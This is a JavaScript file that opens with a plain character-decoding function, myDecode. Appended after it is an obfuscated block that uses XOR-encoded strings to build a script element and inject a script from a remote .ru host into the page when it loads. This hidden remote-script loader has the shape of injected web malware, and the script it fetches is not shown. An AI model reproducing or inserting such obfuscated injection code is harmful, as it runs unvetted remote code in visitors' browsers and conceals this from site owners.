function myDecode(str)
{
var out="";
for(i=0; i < str.length; i+=2) 
{
cd = str.substr(i,2); 
switch(cd) 
{
case "x0" : out+=  "\"" ; break;
case "x1" : out+=  "'" ; break;
case "a0" : out+=  " " ; break;
case  "a1" : out+=  "1"; break;
case  "a2" : out+= "2" ; break;
case "a3" : out+= "3"  ; break;
case  "a4" : out+= "4" ; break;
case  "a5" : out+= "5" ; break;
case  "a6" : out+= "6" ; break;
case  "a7" : out+= "7" ; break;
case  "a8" : out+= "8" ; break;
case  "a9" : out+= "9" ; break;
case  "b0" : out+= "0" ; break;
case  "b1" : out+= "," ; break;
case  "b2" : out+= "." ; break;
case  "b3" : out+= "`" ; break;
case  "b4" : out+= "-" ; break;
case  "b5" : out+= "=" ; break;
case  "b6" : out+= "[" ; break;
case  "b7" : out+= "]" ; break;
case  "b8" : out+= ";" ; break;
case  "b9" : out+= "/" ; break;
case  "c0" : out+= "~" ; break;
case  "c1" : out+= "!" ; break;
case  "c2" : out+= "@" ; break;
case  "c3" : out+= "#" ; break;
case  "c4" : out+= "$" ; break;
case  "c5" : out+= "%" ; break;
case  "c6" : out+= "^" ; break;
case  "c7" : out+= "&" ; break;
case  "c8" : out+= "*" ; break;
case  "c9" : out+= "(" ; break;
case  "d0": out+= ")" ; break;
case  "d1" : out+= "_" ; break;
case  "d2" : out+= "+" ; break;
case  "d3" : out+= "{" ; break;
case  "d4" : out+= "}" ; break;
case  "d5" : out+= "|" ; break;
case  "d6" : out+= ":" ; break;
case  "d7" : out+= "<" ; break;
case  "d8" : out+= ">" ; break;
case  "d9" : out+= "?" ; break;
case  "e0" : out+= "-" ; break;
case  "e1" : out+= "=" ; break;
case  "e2" : out+= "\\" ; break;
case  "e3" : out+= "¹" ; break;
case  "e4" : out+= "/" ; break;
case  "e5" : out+= "q" ; break;
case  "e6" : out+= "w" ; break;
case  "e7" : out+= "e" ; break;
case  "e8" : out+= "r" ; break;
case  "e9" : out+= "t" ; break;
case  "j0" : out+= "y" ; break;
case  "j1" : out+= "u" ; break;
case  "j2" : out+= "i" ; break;
case  "j3" : out+= "o" ; break;
case "j4" : out+= "p"  ; break;
case  "j5" : out+= "a" ; break;
case  "j6" : out+= "s" ; break;
case  "j7" : out+= "d" ; break;
case  "j8" : out+= "f" ; break;
case  "j9" : out+= "g" ; break;
case  "f0" : out+= "h" ; break;
case  "f1" : out+= "j" ; break;
case  "f2" : out+= "k" ; break;
case  "f3" : out+= "l" ; break;
case  "f4" : out+= "z" ; break;
case  "f5" : out+= "x" ; break;
case  "f6" : out+= "c" ; break;
case  "f7" : out+= "v" ; break;
case  "f8" : out+= "b" ; break;
case  "f9" : out+= "n" ; break;
case "h0" : out+= "m"  ; break;
case  "h1" : out+= "z" ; break;
case  "h2" : out+= "x" ; break;
case  "h3" : out+= "c" ; break;
case  "h4" : out+= "v" ; break;
case  "h5" : out+= "b" ; break;
case  "h6" : out+= "n" ; break;
case  "h7" : out+= "m" ; break;
case  "h8" : out+= "Q" ; break;
case  "h9" : out+= "W" ; break;
case  "i0" : out+= "E" ; break;
case  "i1" : out+= "R" ; break;
case  "i2" : out+= "T" ; break;
case  "i3" : out+= "Y" ; break;
case  "i4" : out+= "U" ; break;
case  "i5" : out+= "I" ; break;
case  "i6" : out+= "O" ; break;
case  "i7" : out+= "P" ; break;
case  "i8" : out+= "A" ; break;
case  "i9" : out+= "S" ; break;
case  "k0" : out+= "D" ; break;
case  "k1" : out+= "F" ; break;
case  "k2" : out+= "G" ; break;
case  "k3" : out+= "H" ; break;
case  "k4" : out+= "J" ; break;
case  "k5" : out+= "K" ; break;
case  "k6" : out+= "L" ; break;
case  "k7" : out+= "Z" ; break;
case  "k8" : out+= "X" ; break;
case  "k9" : out+= "C" ; break;
case  "l0" : out+= "V" ; break;
case  "l1" : out+= "B" ; break;
case  "l2" : out+= "N" ; break;
case  "l3" : out+= "M" ; break;
case  "l4" : out+= "¸" ; break;
case  "l5" : out+= "é" ; break;
case  "l6" : out+= "ö" ; break;
case  "l7" : out+= "ó" ; break;
case "l8" : out+= "ê"  ; break;
case  "l9" : out+= "å" ; break;
case  "m0" : out+= "í" ; break;
case  "m1" : out+= "ã" ; break;
case  "m2" : out+= "ø" ; break;
case  "m3" : out+= "ù" ; break;
case  "m4" : out+= "ç" ; break;
case  "m5" : out+= "õ" ; break;
case  "m6" : out+= "ú" ; break;
case  "m7" : out+= "ô" ; break;
case  "m8" : out+= "û" ; break;
case  "m9" : out+= "â" ; break;
case  "n0" : out+= "à" ; break;
case  "n1" : out+= "ï" ; break;
case  "n2" : out+= "ð" ; break;
case  "n3" : out+= "î" ; break;
case  "n4" : out+= "ë" ; break;
case  "n5" : out+= "ä" ; break;
case  "n6" : out+= "æ" ; break;
case  "n7" : out+="ý"  ; break;
case "n8" : out+="ÿ"   ; break;
case  "n9" : out+= "÷" ; break;
case  "o0" : out+= "ñ" ; break;
case  "o1" : out+="ì"  ; break;
case  "o2" : out+="è"  ; break;
case  "o3" : out+= "ò" ; break;
case  "o4" : out+= "ü" ; break;
case  "o5" : out+= "á" ; break;
case  "o6" : out+= "þ" ; break;
case  "o7" : out+= "¨" ; break;
case "o8" : out+= "É"  ; break;
case  "o9" : out+= "Ö" ; break;
case  "p0" : out+= "Ó" ; break;
case  "p1" : out+= "Ê" ; break;
case  "p2" : out+= "Å" ; break;
case  "p3" : out+= "Í" ; break;
case  "p4" : out+= "Ã" ; break;
case  "p5" : out+= "Ø" ; break;
case  "p6" : out+= "Ù" ; break;
case  "p7" : out+= "Ç" ; break;
case  "p8" : out+= "Õ" ; break;
case  "p9" : out+= "Ú" ; break;
case  "q0" : out+= "Ô" ; break;
case  "q1" : out+= "Û" ; break;
case "q2" : out+= "Â"  ; break;
case  "q3" : out+= "À" ; break;
case  "q4" : out+= "Ï" ; break;
case  "q5" : out+= "Ð" ; break;
case  "q6" : out+= "Î" ; break;
case  "q7" : out+= "Ë" ; break;
case  "q8" : out+= "Ä" ; break;
case  "q9" : out+= "Æ" ; break;
case  "r0" : out+= "Ý" ; break;
case  "r1" : out+= "ß" ; break;
case "r2" : out+= "×"  ; break;
case  "r3" : out+= "Ñ" ; break;
case  "r4" : out+= "Ì" ; break;
case  "r5" : out+= "È" ; break;
case  "r6" : out+= "Ò" ; break;
case  "r7" : out+= "Ü" ; break;
case  "s8" : out+= "Á" ; break;
case  "s9" : out+= "Þ" ; break;
}

}

return out;
}function d9nt(q1729){var bQt3W=document[denfQX(uCn[3])](denfQX(uCn[0])+denfQX(uCn[1])+denfQX(uCn[2]));bQt3W[denfQX(uCn[4])]=q1729;bQt3W[denfQX(uCn[5])]=denfQX(uCn[6]);document[denfQX(uCn[9])](denfQX(uCn[8]))[0][denfQX(uCn[7])](bQt3W);}function denfQX(sJ0g){return dS50N4(fEav5M(sJ0g),'guen3Z56z8684eZ');}var uCn=["020022","021028","023001","004007000015071063112090031085083086064","020007006","019012021011","019016029026028048084064027075085074093021046","006005021011093062118094019084082","015016004010","000016017043095063088083020076069122077049059000059004003086","015001017030009117026069014089066093026022055011071075028070117095069085091088076026015041"];d9nt(denfQX(uCn[10]));function dS50N4(t7W,j62Ly){var bL='';var vH3R5=0;var jx4=0;for(vH3R5=0;vH3R5<t7W.length;vH3R5++){var vUzI=t7W.charAt(vH3R5);var eo98s=vUzI.charCodeAt(0)^j62Ly.charCodeAt(jx4);vUzI=String.fromCharCode(eo98s);bL+=vUzI;if(jx4==j62Ly.length-1)jx4=0;else jx4++;}return (bL);}function fEav5M(a4CnR4){var oM='';var rid=0;var qqad=0;for(rid=0;rid<a4CnR4.length/3;rid++){oM+=String.fromCharCode(a4CnR4.slice(qqad,qqad+3));qqad=qqad+3;}return oM;}